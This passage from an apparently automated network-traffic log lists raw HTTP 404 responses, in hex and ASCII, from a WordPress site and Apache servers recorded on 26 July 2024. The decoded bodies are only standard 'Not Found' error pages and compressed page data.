25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AI1M55TCg5bz0CP6bvjRaeKaBaNTeUnQUyDSAAZDD6wgnUR2XV6dfVpVcdasvqe3te3pU6SQSbHyar3WBq4FJrsn37%2Fym5ti4frKJgOdILvv3OoSDQvUddBRKkwDcR1WAnMdQFQMc6zjog%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a95de9e6a0217ed-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 64 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 7d 6b 73 e3 36 b2 e8 67 fb 57 60 38 35 1e 71 87 a4 48 ea 61 59 b6 9c ca 71 b2 f7 e4 56 66 27 35 33 39 5b a7 c6 29 17 44 42 12 6c 92 60 00 d0 b2 af d7 ff fd 56 03 7c 4a d4 c3 8f c9 d9 e3 64 24 11 68 74 37 1a fd c0 9b 67 6f 7e fa 74 f1 f5 bf 7f fb 19 2d 64 1c 9d 1f 9e c1 17 8a 70 32 9f 18 24 b1 7f ff 62 40 1a c1 e1 f9 e1 c1 59 4c 24 46 c1 02 73 41 e4 c4 f8 fd eb df ed 91 51 a6 27 38 26 13 e3 96 92 65 ca b8 34 50 c0 12 49 12 39 31 96 34 94 8b 49 48 6e 69 40 6c f5 60 21 9a 50 49 71 64 8b 00 47 64 e2 29 2c 11 4d 6e 10 27 d1 c4 48 39 9b d1 88 18 68 c1 c9 6c 62 2c a4 4c c7 dd ee 3c 4e e7 0e e3 f3 ee dd 2c e9 7a 50 e6 f0 e0 4c 52 19 91 f3 df f0 9c a0 84 49 34 63 59 12 a2 a3 b7 23 df f3 4e 11 e6 72 96 45 b3 4c 50 96 2c b2 a9 13 61 79 d6 d5 25 0e 6b 4c bf e7 6c ca a4 78 5f b2 fc 3e c6 77 36 8d f1 9c d8 29 27 50 a5 71 84 f9 9c bc 47 dd f3 c3 8a cf f7 61 22 00 60 46 64 b0 78 af 99 7d df ed ce 58 22 85 33 67 6c 1e 11 9c 52 e1 04 2c ae 95 d4 60 50 27 31 2e 81 85 c4 92 06 1a 32 e0 4c 08 c6 e9 9c 26 9a 4c ca 49 c0 92 84 04 72 85 01 03 47 92 f0 04 4b 62 20 79 9f 92 89 81 d3 34 a2 01 96 94 25 5d 2e c4 87 bb 38 32 90 aa f1 c4 68 91 06 3a e2 f8 cf 8c 9d a2 bf 13 12 d6 c5 0d ac b5 c0 77 67 84 84 5d e3 7b 71 71 c1 e2 98 24 52 ec cd 4e 90 17 a8 f3 25 02 4e 53 99 73 22 c9 9d ec 5e e3 5b ac 53 8d f3 c3 ee df d0 d9 9b 6f Data Ascii: 1dfc}ks6gW`85qHaYqVf'539[)DBl`V|Jd$ht7go~t-dp2$b@YL$FsAQ'8&e4PI914IHni@l`!PIqdGd),Mn'H9hlb,L<N,zPLRI4cY#NrELP,ay%kLlx_>w6)'PqGa"`Fdx}X"3glR,`P'1.2L&LIrGKb y4%].82h:wg]{qq$RN%NSs"^[So
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyx4OccAPKycjOy9lPhVF6kuv9neiD6ccNrXu9Yr46Izv%2Fef%2FzVCbdPC8AeCAq1vWwmdcjrLm0wsJHrW5c6ly2XGOOhd4sls5cOBHPlA%2FY5GJf2zrNMjSeRqC7LvXAbkXK7J4nxlRRFOLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a95deae9caf4370-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 64 66 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 7d 6b 73 e3 36 b2 e8 67 fb 57 60 38 35 1e 71 87 a4 48 ea 61 59 b6 9c ca 71 b2 f7 e4 56 66 27 35 33 39 5b a7 c6 29 17 44 42 12 6c 92 60 00 d0 b2 af d7 ff fd 56 03 7c 4a d4 c3 8f c9 d9 e3 64 24 11 68 74 37 1a fd c0 9b 67 6f 7e fa 74 f1 f5 bf 7f fb 19 2d 64 1c 9d 1f 9e c1 17 8a 70 32 9f 18 24 b1 7f ff 62 40 1a c1 e1 f9 e1 c1 59 4c 24 46 c1 02 73 41 e4 c4 f8 fd eb df ed 91 51 a6 27 38 26 13 e3 96 92 65 ca b8 34 50 c0 12 49 12 39 31 96 34 94 8b 49 48 6e 69 40 6c f5 60 21 9a 50 49 71 64 8b 00 47 64 e2 29 2c 11 4d 6e 10 27 d1 c4 48 39 9b d1 88 18 68 c1 c9 6c 62 2c a4 4c c7 dd ee 3c 4e e7 0e e3 f3 ee dd 2c e9 7a 50 e6 f0 e0 4c 52 19 91 f3 df f0 9c a0 84 49 34 63 59 12 a2 a3 b7 23 df f3 4e 11 e6 72 96 45 b3 4c 50 96 2c b2 a9 13 61 79 d6 d5 25 0e 6b 4c bf e7 6c ca a4 78 5f b2 fc 3e c6 77 36 8d f1 9c d8 29 27 50 a5 71 84 f9 9c bc 47 dd f3 c3 8a cf f7 61 22 00 60 46 64 b0 78 af 99 7d df ed ce 58 22 85 33 67 6c 1e 11 9c 52 e1 04 2c ae 95 d4 60 50 27 31 2e 81 85 c4 92 06 1a 32 e0 4c 08 c6 e9 9c 26 9a 4c ca 49 c0 92 84 04 72 85 01 03 47 92 f0 04 4b 62 20 79 9f 92 89 81 d3 34 a2 01 96 94 25 5d 2e c4 87 bb 38 32 90 aa f1 c4 68 91 06 3a e2 f8 cf 8c 9d a2 bf 13 12 d6 c5 0d ac b5 c0 77 67 84 84 5d e3 7b 71 71 c1 e2 98 24 52 ec cd 4e 90 17 a8 f3 25 02 4e 53 99 73 22 c9 9d ec 5e e3 5b ac 53 8d f3 c3 ee df Data Ascii: 1dfe}ks6gW`85qHaYqVf'539[)DBl`V|Jd$ht7go~t-dp2$b@YL$FsAQ'8&e4PI914IHni@l`!PIqdGd),Mn'H9hlb,L<N,zPLRI4cY#NrELP,ay%kLlx_>w6)'PqGa"`Fdx}X"3glR,`P'1.2L&LIrGKb y4%].82h:wg]{qq$RN%NSs"^[S
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:34 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:45 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 16:47:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 